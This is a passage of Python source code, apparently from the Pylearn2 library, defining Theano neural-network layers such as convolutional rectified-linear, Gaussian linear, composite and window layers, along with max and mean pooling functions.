set_biases(self, biases): self.b.set_value(biases) @wraps(Layer.get_biases) def get_biases(self): return self.b.get_value() @wraps(Layer.get_weights_format) def get_weights_format(self): return ('v', 'h') @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): if not hasattr(self, 'W_lr_scale'): self.W_lr_scale = None if not hasattr(self, 'b_lr_scale'): self.b_lr_scale = None rval = OrderedDict() if self.W_lr_scale is not None: W, = self.transformer.get_params() rval[W] = self.W_lr_scale if self.b_lr_scale is not None: rval[self.b] = self.b_lr_scale return rval @wraps(Layer.get_weights_topo) def get_weights_topo(self): outp, inp, rows, cols = range(4) raw = self.transformer._filters.get_value() return np.transpose(raw, (outp, rows, cols, inp)) @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): W, = self.transformer.get_params() assert W.ndim == 4 sq_W = T.sqr(W) row_norms = T.sqrt(sq_W.sum(axis=(1, 2, 3))) rval = OrderedDict([ ('kernel_norms_min', row_norms.min()), ('kernel_norms_mean', row_norms.mean()), ('kernel_norms_max', row_norms.max()), ]) cst = self.cost orval = self.nonlin.get_monitoring_channels_from_state(state, targets, cost_fn=cst) rval.update(orval) return rval @wraps(Layer.fprop) def fprop(self, state_below): self.input_space.validate(state_below) z = self.transformer.lmul(state_below) if not hasattr(self, 'tied_b'): self.tied_b = False if self.tied_b: b = self.b.dimshuffle('x', 0, 'x', 'x') else: b = self.b.dimshuffle('x', 0, 1, 2) z = z + b d = self.nonlin.apply(z) if self.layer_name is not None: d.name = self.layer_name + '_z' self.detector_space.validate(d) if self.pool_type is not None: if not hasattr(self, 'detector_normalization'): self.detector_normalization = None if self.detector_normalization: d = self.detector_normalization(d) assert self.pool_type in ['max', 'mean'], ("pool_type should be" "either max or mean" "pooling.") if self.pool_type == 'max': p = max_pool(bc01=d, pool_shape=self.pool_shape, pool_stride=self.pool_stride, image_shape=self.detector_space.shape) elif self.pool_type == 'mean': p = mean_pool(bc01=d, pool_shape=self.pool_shape, pool_stride=self.pool_stride, image_shape=self.detector_space.shape) self.output_space.validate(p) else: p = d if not hasattr(self, 'output_normalization'): self.output_normalization = None if self.output_normalization: p = self.output_normalization(p) return p def cost(self, Y, Y_hat): """ Cost for convnets is hardcoded to be the cost for sigmoids. TODO: move the cost into the non-linearity class. Parameters ---------- Y : theano.gof.Variable Output of `fprop` Y_hat : theano.gof.Variable Targets Returns ------- cost : theano.gof.Variable 0-D tensor describing the cost Notes ----- Cost mean across units, mean across batch of KL divergence KL(P || Q) where P is defined by Y and Q is defined by Y_hat KL(P || Q) = p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q) """ assert self.nonlin.non_lin_name == "sigmoid", ("ConvElemwise " "supports " "cost function " "for only " "sigmoid layer " "for now.") batch_axis = self.output_space.get_batch_axis() ave_total = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis) ave = ave_total.mean() return ave class ConvRectifiedLinear(ConvElemwise): """ A convolutional rectified linear layer, based on theano's B01C formatted convolution. Parameters ---------- output_channels : int The number of output channels the layer should have. kernel_shape : tuple The shape of the convolution kernel. pool_shape : tuple The shape of the spatial max pooling. A two-tuple of ints. pool_stride : tuple The stride of the spatial max pooling. Also must be square. layer_name : str A name for this layer that will be prepended to monitoring channels related to this layer. irange : float if specified, initializes each weight randomly in U(-irange, irange) border_mode : str A string indicating the size of the output: - "full" : The output is the full discrete linear convolution of the inputs. - "valid" : The output consists only of those elements that do not rely on the zero-padding. (Default) include_prob : float probability of including a weight element in the set of weights initialized to U(-irange, irange). If not included it is initialized to 0. init_bias : float All biases are initialized to this number W_lr_scale : float The learning rate on the weights for this layer is multiplied by this scaling factor b_lr_scale : float The learning rate on the biases for this layer is multiplied by this scaling factor left_slope : float The slope of the left half of the activation function max_kernel_norm : float If specifed, each kernel is constrained to have at most this norm. pool_type : The type of the pooling operation performed the the convolution. Default pooling type is max-pooling. tied_b : bool If true, all biases in the same channel are constrained to be the same as each other. Otherwise, each bias at each location is learned independently. detector_normalization : callable See `output_normalization` output_normalization : callable if specified, should be a callable object. the state of the network is optionally replaced with normalization(state) at each of the 3 points in processing: - detector: the rectifier units can be normalized prior to the spatial pooling - output: the output of the layer, after spatial pooling, can be normalized as well kernel_stride : tuple The stride of the convolution kernel. A two-tuple of ints. """ def __init__(self, output_channels, kernel_shape, pool_shape, pool_stride, layer_name, irange=None, border_mode='valid', sparse_init=None, include_prob=1.0, init_bias=0., W_lr_scale=None, b_lr_scale=None, left_slope=0.0, max_kernel_norm=None, pool_type='max', tied_b=False, detector_normalization=None, output_normalization=None, kernel_stride=(1, 1), monitor_style="classification"): nonlinearity = RectifierConvNonlinearity(left_slope) if (irange is None) and (sparse_init is None): raise AssertionError("You should specify either irange or " "sparse_init when calling the constructor of " "ConvRectifiedLinear.") elif (irange is not None) and (sparse_init is not None): raise AssertionError("You should specify either irange or " "sparse_init when calling the constructor of " "ConvRectifiedLinear and not both.") # Alias the variables for pep8 mkn = max_kernel_norm dn = detector_normalization on = output_normalization super(ConvRectifiedLinear, self).__init__(output_channels, kernel_shape, layer_name, nonlinearity, irange=irange, border_mode=border_mode, sparse_init=sparse_init, include_prob=include_prob, init_bias=init_bias, W_lr_scale=W_lr_scale, b_lr_scale=b_lr_scale, pool_shape=pool_shape, pool_stride=pool_stride, max_kernel_norm=mkn, pool_type=pool_type, tied_b=tied_b, detector_normalization=dn, output_normalization=on, kernel_stride=kernel_stride, monitor_style=monitor_style) def pool_dnn(bc01, pool_shape, pool_stride, mode='max'): """ cuDNN pooling op. Parameters ---------- bc01 : theano tensor Minibatch in format (batch size, channels, rows, cols). pool_shape : tuple Shape of the pool region (rows, cols). pool_stride : tuple Strides between pooling regions (row stride, col stride). mode : str Flag for `mean` or `max` pooling. Returns ------- mx : theano tensor The output of pooling applied to `bc01`. """ assert mode in ['max', 'mean'] if mode == 'mean': raise NotImplementedError('Mean pooling is not implemented ' 'in Pylearn2 using cuDNN as of ' 'January 19th, 2015.') mx = dnn_pool(bc01, tuple(pool_shape), tuple(pool_stride), mode) return mx def max_pool(bc01, pool_shape, pool_stride, image_shape, try_dnn=True): """ Theano's max pooling op only supports pool_stride = pool_shape so here we have a graph that does max pooling with strides Parameters ---------- bc01 : theano tensor minibatch in format (batch size, channels, rows, cols) pool_shape : tuple shape of the pool region (rows, cols) pool_stride : tuple strides between pooling regions (row stride, col stride) image_shape : tuple avoid doing some of the arithmetic in theano try_dnn : bool Flag to set cuDNN use (default: True). Returns ------- pooled : theano tensor The output of pooling applied to `bc01` See Also -------- max_pool_c01b : Same functionality but with ('c', 0, 1, 'b') axes sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality as `max_pool_c01b` but GPU-only and considerably faster. mean_pool : Mean pooling instead of max pooling """ mx = None r, c = image_shape pr, pc = pool_shape rs, cs = pool_stride assert pr <= r assert pc <= c name = bc01.name if name is None: name = 'anon_bc01' if try_dnn and bc01.dtype == "float32": use_dnn = dnn_available() else: use_dnn = False if pool_shape == pool_stride and not use_dnn: mx = max_pool_2d(bc01, pool_shape, False) mx.name = 'max_pool(' + name + ')' return mx # Compute index in pooled space of last needed pool # (needed = each input pixel must appear in at least one pool) def last_pool(im_shp, p_shp, p_strd): rval = int(np.ceil(float(im_shp - p_shp) / p_strd)) assert p_strd * rval + p_shp >= im_shp assert p_strd * (rval - 1) + p_shp < im_shp # Catch case where p_strd > p_shp causes pool # to be set outside of im_shp. if p_strd * rval >= im_shp: rval -= 1 return rval # Compute starting row of the last pool last_pool_r = last_pool(image_shape[0], pool_shape[0], pool_stride[0]) * pool_stride[0] # Compute number of rows needed in image for all indexes to work out required_r = last_pool_r + pr last_pool_c = last_pool(image_shape[1], pool_shape[1], pool_stride[1]) * pool_stride[1] required_c = last_pool_c + pc for bc01v in get_debug_values(bc01): assert not contains_inf(bc01v) assert bc01v.shape[2] == image_shape[0] assert bc01v.shape[3] == image_shape[1] if (required_r > r) or (required_c > c): small_r = min(required_r, r) small_c = min(required_c, c) assert bc01.dtype.startswith('float') wide_infinity = T.alloc(T.constant(-np.inf, dtype=bc01.dtype), bc01.shape[0], bc01.shape[1], required_r, required_c) bc01 = T.set_subtensor(wide_infinity[:, :, 0:small_r, 0:small_c], bc01[:, :, 0:small_r, 0:small_c]) name = 'infinite_padded_' + name if use_dnn: mx = pool_dnn(bc01, pool_shape, pool_stride, 'max') else: for row_within_pool in xrange(pool_shape[0]): row_stop = last_pool_r + row_within_pool + 1 for col_within_pool in xrange(pool_shape[1]): col_stop = last_pool_c + col_within_pool + 1 cur = bc01[:, :, row_within_pool:row_stop:rs, col_within_pool:col_stop:cs] cur.name = ('max_pool_cur_' + name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) if mx is None: mx = cur else: mx = T.maximum(mx, cur) mx.name = ('max_pool_mx_' + name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) mx.name = 'max_pool(' + name + ')' for mxv in get_debug_values(mx): assert isfinite(mxv) return mx def max_pool_c01b(c01b, pool_shape, pool_stride, image_shape): """ Theano's max pooling op only supports pool_stride = pool_shape so here we have a graph that does max pooling with strides Parameters ---------- c01b : theano tensor minibatch in format (channels, rows, cols, batch size) pool_shape : tuple shape of the pool region (rows, cols) pool_stride : tuple strides between pooling regions (row stride, col stride) image_shape : tuple avoid doing some of the arithmetic in theano Returns ------- pooled : theano tensor The output of pooling applied to `c01b` See Also -------- sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality but GPU-only and considerably faster. max_pool : Same functionality but with ('b', 0, 1, 'c') axes """ mx = None r, c = image_shape pr, pc = pool_shape rs, cs = pool_stride assert pr > 0 assert pc > 0 assert pr <= r assert pc <= c # Compute index in pooled space of last needed pool # (needed = each input pixel must appear in at least one pool) def last_pool(im_shp, p_shp, p_strd): rval = int(np.ceil(float(im_shp - p_shp) / p_strd)) assert p_strd * rval + p_shp >= im_shp assert p_strd * (rval - 1) + p_shp < im_shp return rval # Compute starting row of the last pool last_pool_r = last_pool(image_shape[0], pool_shape[0], pool_stride[0]) * pool_stride[0] # Compute number of rows needed in image for all indexes to work out required_r = last_pool_r + pr last_pool_c = last_pool(image_shape[1], pool_shape[1], pool_stride[1]) * pool_stride[1] required_c = last_pool_c + pc for c01bv in get_debug_values(c01b): assert not contains_inf(c01bv) assert c01bv.shape[1] == r assert c01bv.shape[2] == c wide_infinity = T.alloc(-np.inf, c01b.shape[0], required_r, required_c, c01b.shape[3]) name = c01b.name if name is None: name = 'anon_bc01' c01b = T.set_subtensor(wide_infinity[:, 0:r, 0:c, :], c01b) c01b.name = 'infinite_padded_' + name for row_within_pool in xrange(pool_shape[0]): row_stop = last_pool_r + row_within_pool + 1 for col_within_pool in xrange(pool_shape[1]): col_stop = last_pool_c + col_within_pool + 1 cur = c01b[:, row_within_pool:row_stop:rs, col_within_pool:col_stop:cs, :] cur.name = ('max_pool_cur_' + c01b.name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) if mx is None: mx = cur else: mx = T.maximum(mx, cur) mx.name = ('max_pool_mx_' + c01b.name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) mx.name = 'max_pool(' + name + ')' for mxv in get_debug_values(mx): assert isfinite(mxv) return mx def mean_pool(bc01, pool_shape, pool_stride, image_shape): """ Does mean pooling (aka average pooling) via a Theano graph. Parameters ---------- bc01 : theano tensor minibatch in format (batch size, channels, rows, cols) pool_shape : tuple shape of the pool region (rows, cols) pool_stride : tuple strides between pooling regions (row stride, col stride) image_shape : tuple (rows, cols) tuple to avoid doing some arithmetic in theano Returns ------- pooled : theano tensor The output of pooling applied to `bc01` See Also -------- max_pool : Same thing but with max pooling Examples -------- >>> import theano >>> import theano.tensor as T >>> from pylearn2.models.mlp import mean_pool >>> import numpy as np >>> t = np.array([[1, 1, 3, 3], ... [1, 1, 3, 3], ... [5, 5, 7, 7], ... [5, 5, 7, 7], ... [9, 9, 11, 11], ... [9, 9, 11, 11]]) >>> X = np.zeros((3, t.shape[0], t.shape[1])) >>> X[:] = t >>> X = X[np.newaxis] >>> X_sym = T.tensor4('X') >>> pool_it = mean_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2), ... image_shape=(6, 4)) >>> f = theano.function(inputs=[X_sym], outputs=pool_it) This will pool over over windows of size (2, 2) while also stepping by this same amount, shrinking the examples input to [[1, 3], [5, 7], [9, 11]]. """ mx = None r, c = image_shape pr, pc = pool_shape rs, cs = pool_stride # Compute index in pooled space of last needed pool # (needed = each input pixel must appear in at least one pool) def last_pool(im_shp, p_shp, p_strd): rval = int(np.ceil(float(im_shp - p_shp) / p_strd)) assert p_strd * rval + p_shp >= im_shp assert p_strd * (rval - 1) + p_shp < im_shp return rval # Compute starting row of the last pool last_pool_r = last_pool(image_shape[0], pool_shape[0], pool_stride[0]) * pool_stride[0] # Compute number of rows needed in image for all indexes to work out required_r = last_pool_r + pr last_pool_c = last_pool(image_shape[1], pool_shape[1], pool_stride[1]) * pool_stride[1] required_c = last_pool_c + pc for bc01v in get_debug_values(bc01): assert not contains_inf(bc01v) assert bc01v.shape[2] == image_shape[0] assert bc01v.shape[3] == image_shape[1] wide_infinity = T.alloc(-np.inf, bc01.shape[0], bc01.shape[1], required_r, required_c) name = bc01.name if name is None: name = 'anon_bc01' bc01 = T.set_subtensor(wide_infinity[:, :, 0:r, 0:c], bc01) bc01.name = 'infinite_padded_' + name # Create a 'mask' used to keep count of the number of elements summed for # each position wide_infinity_count = T.alloc(0, bc01.shape[0], bc01.shape[1], required_r, required_c) bc01_count = T.set_subtensor(wide_infinity_count[:, :, 0:r, 0:c], 1) for row_within_pool in xrange(pool_shape[0]): row_stop = last_pool_r + row_within_pool + 1 for col_within_pool in xrange(pool_shape[1]): col_stop = last_pool_c + col_within_pool + 1 cur = bc01[:, :, row_within_pool:row_stop:rs, col_within_pool:col_stop:cs] cur.name = ('mean_pool_cur_' + bc01.name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) cur_count = bc01_count[:, :, row_within_pool:row_stop:rs, col_within_pool:col_stop:cs] if mx is None: mx = cur count = cur_count else: mx = mx + cur count = count + cur_count mx.name = ('mean_pool_mx_' + bc01.name + '_' + str(row_within_pool) + '_' + str(col_within_pool)) mx /= count mx.name = 'mean_pool(' + name + ')' for mxv in get_debug_values(mx): assert isfinite(mxv) return mx @wraps(_WD) def WeightDecay(*args, **kwargs): warnings.warn("pylearn2.models.mlp.WeightDecay has moved to " "pylearn2.costs.mlp.WeightDecay. This link" "may be removed after 2015-05-13.") return _WD(*args, **kwargs) @wraps(_L1WD) def L1WeightDecay(*args, **kwargs): warnings.warn("pylearn2.models.mlp.L1WeightDecay has moved to " "pylearn2.costs.mlp.WeightDecay. This link" "may be removed after 2015-05-13.") return _L1WD(*args, **kwargs) class LinearGaussian(Linear): """ A Linear layer augmented with a precision vector, for modeling conditionally Gaussian data. Specifically, given an input x, this layer models the distrbution over the output as y ~ p(y | x) = N(y | Wx + b, beta^-1) i.e., y is conditionally Gaussian with mean Wx + b and variance beta^-1. beta is a diagonal precision matrix so beta^-1 is a diagonal covariance matrix. Internally, beta is stored as the vector of diagonal values on this matrix. Since the output covariance is not a function of the input, this does not provide an example-specific estimate of the error in the mean. However, the vector-valued beta does mean that maximizing log p(y | x) will reweight the mean squared error so that variables that can be estimated easier will receive a higher penalty. This is one way of adapting the model better to heterogenous data. Parameters ---------- init_beta : float or ndarray Any value > 0 that can be broadcasted to a vector of shape (dim, ). The elements of beta are initialized to this value. A good value is often the precision (inverse variance) of the target variables in the training set, as provided by the `beta_from_targets` function. This is the optimal beta for a dummy model that just predicts the mean target value from the training set. min_beta : float The elements of beta are constrained to be >= this value. This value must be > 0., otherwise the output conditional is not constrained to be a valid probability distribution. A good value is often the precision (inverse variance) of the target variables in the training set, as provided by the `beta_from_targets` function. This is the optimal beta for a dummy model that just predicts the mean target value from the training set. A trained model should always be able to obtain at least this much precision, at least on the training set. max_beta : float The elements of beta are constrained to be <= this value. We impose this constraint because for problems where the training set values can be predicted exactly, beta can grow without bound, which also makes the gradients grow without bound, resulting in numerical problems. kwargs : dict Arguments to the `Linear` superclass. """ def __init__(self, init_beta, min_beta, max_beta, beta_lr_scale, **kwargs): super(LinearGaussian, self).__init__(**kwargs) self.__dict__.update(locals()) del self.self del self.kwargs @wraps(Layer.set_input_space) def set_input_space(self, space): super(LinearGaussian, self).set_input_space(space) assert isinstance(self.output_space, VectorSpace) self.beta = sharedX(self.output_space.get_origin() + self.init_beta, 'beta') @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): rval = super(LinearGaussian, self).get_layer_monitoring_channels(state_below, state, targets) assert isinstance(rval, OrderedDict) rval['beta_min'] = self.beta.min() rval['beta_mean'] = self.beta.mean() rval['beta_max'] = self.beta.max() if targets: rval['mse'] = T.sqr(state - targets).mean() return rval @wraps(Linear.cost) def cost(self, Y, Y_hat): return (0.5 * T.dot(T.sqr(Y - Y_hat), self.beta).mean() - 0.5 * T.log(self.beta).sum()) @wraps(Layer._modify_updates) def _modify_updates(self, updates): super(LinearGaussian, self)._modify_updates(updates) if self.beta in updates: updates[self.beta] = T.clip(updates[self.beta], self.min_beta, self.max_beta) @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): rval = super(LinearGaussian, self).get_lr_scalers() if self.beta_lr_scale is not None: rval[self.beta] = self.beta_lr_scale return rval @wraps(Layer.get_params) def get_params(self): return super(LinearGaussian, self).get_params() + [self.beta] def beta_from_design(design, min_var=1e-6, max_var=1e6): """ Returns the marginal precision of a design matrix. Parameters ---------- design : ndarray A numpy ndarray containing a design matrix min_var : float max_var : float All variances are constrained to lie in the range [min_var, max_var] to avoid numerical issues like infinite precision. Returns ------- beta : ndarray A 1D vector containing the marginal precision of each variable in the design matrix. """ return 1. / np.clip(design.var(axis=0), min_var, max_var) def beta_from_targets(dataset, **kwargs): """ Returns the marginal precision of the targets in a dataset. Parameters ---------- dataset : DenseDesignMatrix A DenseDesignMatrix with a targets field `y` kwargs : dict Extra arguments to `beta_from_design` Returns ------- beta : ndarray A 1-D vector containing the marginal precision of the *targets* in `dataset`. """ return beta_from_design(dataset.y, **kwargs) def beta_from_features(dataset, **kwargs): """ Returns the marginal precision of the features in a dataset. Parameters ---------- dataset : DenseDesignMatrix The dataset to compute the precision on. kwargs : dict Passed through to `beta_from_design` Returns ------- beta : ndarray Vector of precision values for each feature in `dataset` """ return beta_from_design(dataset.X, **kwargs) def mean_of_targets(dataset): """ Returns the mean of the targets in a dataset. Parameters ---------- dataset : DenseDesignMatrix Returns ------- mn : ndarray A 1-D vector with entry i giving the mean of target i """ return dataset.y.mean(axis=0) class PretrainedLayer(Layer): """ A layer whose weights are initialized, and optionally fixed, based on prior training. Parameters ---------- layer_content : Model Should implement "upward_pass" (RBM and Autoencoder do this) freeze_params: bool If True, regard layer_conent's parameters as fixed If False, they become parameters of this layer and can be fine-tuned to optimize the MLP's cost function. """ def __init__(self, layer_name, layer_content, freeze_params=False): super(PretrainedLayer, self).__init__() self.__dict__.update(locals()) del self.self @wraps(Layer.set_input_space) def set_input_space(self, space): assert self.get_input_space() == space @wraps(Layer.get_params) def get_params(self): if self.freeze_params: return [] return self.layer_content.get_params() @wraps(Layer.get_input_space) def get_input_space(self): return self.layer_content.get_input_space() @wraps(Layer.get_output_space) def get_output_space(self): return self.layer_content.get_output_space() @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): return OrderedDict([]) @wraps(Layer.fprop) def fprop(self, state_below): return self.layer_content.upward_pass(state_below) class CompositeLayer(Layer): """ A Layer that runs several layers in parallel. Its default behavior is to pass the layer's input to each of the components. Alternatively, it can take a CompositeSpace as an input and a mapping from inputs to layers i.e. providing each component layer with a subset of the inputs. Parameters ---------- layer_name : str The name of this layer layers : tuple or list The component layers to run in parallel. inputs_to_layers : dict mapping int to list of ints, optional Can only be used if the input space is a CompositeSpace. If inputs_to_layers[i] contains j, it means input i will be given as input to component j. Note that if multiple inputs are passed on to e.g. an inner CompositeLayer, the same order will be maintained. If the list is empty, the input will be discarded. If an input does not appear in the dictionary, it will be given to all components. Examples -------- >>> composite_layer = CompositeLayer( ... layer_name='composite_layer', ... layers=[Tanh(7, 'h0', 0.1), Sigmoid(5, 'h1', 0.1)], ... inputs_to_layers={ ... 0: [1], ... 1: [0] ... }) This CompositeLayer has a CompositeSpace with 2 subspaces as its input space. The first input is given to the Sigmoid layer, the second input is given to the Tanh layer. >>> wrapper_layer = CompositeLayer( ... layer_name='wrapper_layer', ... layers=[Linear(9, 'h2', 0.1), ... composite_layer, ... Tanh(7, 'h3', 0.1)], ... inputs_to_layers={ ... 0: [1], ... 2: [] ... }) This CompositeLayer takes 3 inputs. The first one is given to the inner CompositeLayer. The second input is passed on to each component layer i.e. to the Tanh, Linear as well as CompositeLayer. The third input is discarded. Note that the inner CompositeLayer wil receive the inputs with the same ordering i.e. [0, 1], and never [1, 0]. """ def __init__(self, layer_name, layers, inputs_to_layers=None): self.num_layers = len(layers) if inputs_to_layers is not None: if not isinstance(inputs_to_layers, dict): raise TypeError("CompositeLayer expected inputs_to_layers to " "be dict, got " + str(type(inputs_to_layers))) self.inputs_to_layers = OrderedDict() for key in sorted(inputs_to_layers): assert isinstance(key, py_integer_types) value = inputs_to_layers[key] assert is_iterable(value) assert all(isinstance(v, py_integer_types) for v in value) # Check 'not value' to support case of empty list assert not value or all(0 <= v < self.num_layers for v in value) self.inputs_to_layers[key] = sorted(value) super(CompositeLayer, self).__init__() self.__dict__.update(locals()) del self.self @property def routing_needed(self): return self.inputs_to_layers is not None @wraps(Layer.set_input_space) def set_input_space(self, space): if not isinstance(space, CompositeSpace): if self.inputs_to_layers is not None: raise ValueError("CompositeLayer received an inputs_to_layers " "mapping, but does not have a CompositeSpace " "as its input space, so there is nothing to " "map. Received " + str(space) + " as input " "space.") elif self.routing_needed: if not max(self.inputs_to_layers) < len(space.components): raise ValueError("The inputs_to_layers mapping of " "CompositeSpace contains they key " + str(max(self.inputs_to_layers)) + " " "(0-based) but the input space only " "contains " + str(self.num_layers) + " " "layers.") # Invert the dictionary self.layers_to_inputs = OrderedDict() for i in xrange(self.num_layers): inputs = [] for j in xrange(len(space.components)): if j in self.inputs_to_layers: if i in self.inputs_to_layers[j]: inputs.append(j) else: inputs.append(j) self.layers_to_inputs[i] = inputs for i, layer in enumerate(self.layers): if self.routing_needed and i in self.layers_to_inputs: cur_space = space.restrict(self.layers_to_inputs[i]) else: cur_space = space layer.set_input_space(cur_space) self.input_space = space self.output_space = CompositeSpace(tuple(layer.get_output_space() for layer in self.layers)) self._target_space = CompositeSpace(tuple(layer.get_target_space() for layer in self.layers)) @wraps(Layer.get_params) def get_params(self): rval = [] for layer in self.layers: rval = safe_union(layer.get_params(), rval) return rval @wraps(Layer.fprop) def fprop(self, state_below): rvals = [] for i, layer in enumerate(self.layers): if self.routing_needed and i in self.layers_to_inputs: cur_state_below = [state_below[j] for j in self.layers_to_inputs[i]] # This is to mimic the behavior of CompositeSpace's restrict # method, which only returns a CompositeSpace when the number # of components is greater than 1 if len(cur_state_below) == 1: cur_state_below, = cur_state_below else: cur_state_below = state_below rvals.append(layer.fprop(cur_state_below)) return tuple(rvals) def _weight_decay_aggregate(self, method_name, coeff): if isinstance(coeff, py_float_types): return T.sum([getattr(layer, method_name)(coeff) for layer in self.layers]) elif is_iterable(coeff): assert all(layer_coeff >= 0 for layer_coeff in coeff) return T.sum([getattr(layer, method_name)(layer_coeff) for layer, layer_coeff in safe_zip(self.layers, coeff) if layer_coeff > 0], dtype=config.floatX) else: raise TypeError("CompositeLayer's " + method_name + " received " "coefficients of type " + str(type(coeff)) + " " "but must be provided with a float or list/tuple") def get_weight_decay(self, coeff): """ Provides an expression for a squared L2 penalty on the weights, which is the weighted sum of the squared L2 penalties of the layer components. Parameters ---------- coeff : float or tuple/list The coefficient on the squared L2 weight decay penalty for this layer. If a single value is provided, this coefficient is used for each component layer. If a list of tuple of coefficients is given they are passed on to the component layers in the given order. Returns ------- weight_decay : theano.gof.Variable An expression for the squared L2 weight decay penalty term for this layer. """ return self._weight_decay_aggregate('get_weight_decay', coeff) def get_l1_weight_decay(self, coeff): """ Provides an expression for a squared L1 penalty on the weights, which is the weighted sum of the squared L1 penalties of the layer components. Parameters ---------- coeff : float or tuple/list The coefficient on the L1 weight decay penalty for this layer. If a single value is provided, this coefficient is used for each component layer. If a list of tuple of coefficients is given they are passed on to the component layers in the given order. Returns ------- weight_decay : theano.gof.Variable An expression for the L1 weight decay penalty term for this layer. """ return self._weight_decay_aggregate('get_l1_weight_decay', coeff) @wraps(Layer.cost) def cost(self, Y, Y_hat): return sum(layer.cost(Y_elem, Y_hat_elem) for layer, Y_elem, Y_hat_elem in safe_zip(self.layers, Y, Y_hat)) @wraps(Layer.set_mlp) def set_mlp(self, mlp): super(CompositeLayer, self).set_mlp(mlp) for layer in self.layers: layer.set_mlp(mlp) @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): rval = OrderedDict() # TODO: reduce redundancy with fprop method for i, layer in enumerate(self.layers): if self.routing_needed and i in self.layers_to_inputs: cur_state_below = [state_below[j] for j in self.layers_to_inputs[i]] # This is to mimic the behavior of CompositeSpace's restrict # method, which only returns a CompositeSpace when the number # of components is greater than 1 if len(cur_state_below) == 1: cur_state_below, = cur_state_below else: cur_state_below = state_below if state is not None: cur_state = state[i] else: cur_state = None if targets is not None: cur_targets = targets[i] else: cur_targets = None d = layer.get_layer_monitoring_channels( cur_state_below, cur_state, cur_targets) for key in d: rval[layer.layer_name + '_' + key] = d[key] return rval @wraps(Model._modify_updates) def _modify_updates(self, updates): for layer in self.layers: layer.modify_updates(updates) @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): return get_lr_scalers_from_layers(self) class FlattenerLayer(Layer): """ A wrapper around a different layer that flattens the original layer's output. The cost works by unflattening the target and then calling the wrapped Layer's cost. This is mostly intended for use with CompositeLayer as the wrapped Layer, and is mostly useful as a workaround for theano not having a TupleVariable with which to represent a composite target. There are obvious memory, performance, and readability issues with doing this, so really it would be better for theano to support TupleTypes. See pylearn2.sandbox.tuple_var and the theano-dev e-mail thread "TupleType". Parameters ---------- raw_layer : Layer Layer that FlattenerLayer wraps. """ def __init__(self, raw_layer): super(FlattenerLayer, self).__init__() self.__dict__.update(locals()) del self.self self.layer_name = raw_layer.layer_name @wraps(Layer.set_input_space) def set_input_space(self, space): self.raw_layer.set_input_space(space) total_dim = self.raw_layer.get_output_space().get_total_dimension() self.output_space = VectorSpace(total_dim) @wraps(Layer.get_input_space) def get_input_space(self): return self.raw_layer.get_input_space() @wraps(Layer.get_monitoring_channels) def get_monitoring_channels(self, data): return self.raw_layer.get_monitoring_channels(data) @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): raw_space = self.raw_layer.get_output_space() state = raw_space.undo_format_as(state, self.get_output_space()) if targets is not None: targets = self.get_target_space().format_as( targets, self.raw_layer.get_target_space()) return self.raw_layer.get_layer_monitoring_channels( state_below=state_below, state=state, targets=targets ) @wraps(Layer.get_monitoring_data_specs) def get_monitoring_data_specs(self): return self.raw_layer.get_monitoring_data_specs() @wraps(Layer.get_params) def get_params(self): return self.raw_layer.get_params() @wraps(Layer.get_weights) def get_weights(self): return self.raw_layer.get_weights() @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeffs): return self.raw_layer.get_weight_decay(coeffs) @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeffs): return self.raw_layer.get_l1_weight_decay(coeffs) @wraps(Layer.set_batch_size) def set_batch_size(self, batch_size): self.raw_layer.set_batch_size(batch_size) @wraps(Layer._modify_updates) def _modify_updates(self, updates): self.raw_layer.modify_updates(updates) @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): return self.raw_layer.get_lr_scalers() @wraps(Layer.fprop) def fprop(self, state_below): raw = self.raw_layer.fprop(state_below) return self.raw_layer.get_output_space().format_as(raw, self.output_space) @wraps(Layer.cost) def cost(self, Y, Y_hat): raw_space = self.raw_layer.get_output_space() target_space = self.output_space raw_Y = target_space.format_as(Y, raw_space) raw_Y_hat = raw_space.undo_format_as(Y_hat, target_space) raw_space.validate(raw_Y_hat) return self.raw_layer.cost(raw_Y, raw_Y_hat) @wraps(Layer.set_mlp) def set_mlp(self, mlp): super(FlattenerLayer, self).set_mlp(mlp) self.raw_layer.set_mlp(mlp) @wraps(Layer.get_weights) def get_weights(self): return self.raw_layer.get_weights() class WindowLayer(Layer): """ Layer used to select a window of an image input. The input of the layer must be Conv2DSpace. Parameters ---------- layer_name : str A name for this layer. window : tuple A four-tuple of ints indicating respectively the top left x and y position, and the bottom right x and y position of the window. """ def __init__(self, layer_name, window): super(WindowLayer, self).__init__() self.__dict__.update(locals()) del self.self if window[0] < 0 or window[0] > window[2] or \ window[1] < 0 or window[1] > window[3]: raise ValueError("WindowLayer: bad window parameter") @wraps(Layer.fprop) def fprop(self, state_below): extracts = [slice(None), slice(None), slice(None), slice(None)] extracts[self.rows] = slice(self.window[0], self.window[2] + 1) extracts[self.cols] = slice(self.window[1], self.window[3] + 1) extracts = tuple(extracts) return state_below[extracts] @wraps(Layer.set_input_space) def set_input_space(self, space): self.input_space = space if not isinstance(space, Conv2DSpace): raise TypeError("The input to a Window layer should be a " "Conv2DSpace, but layer " + self.layer_name + " got " + str(type(self.input_space))) axes = space.axes self.rows = axes.index(0) self.cols = axes.index(1) nrows = space.shape[0] ncols = space.shape[1] if self.window[2] + 1 > nrows or self.window[3] + 1 > ncols: raise ValueError("WindowLayer: bad window shape. " "Input is [" + 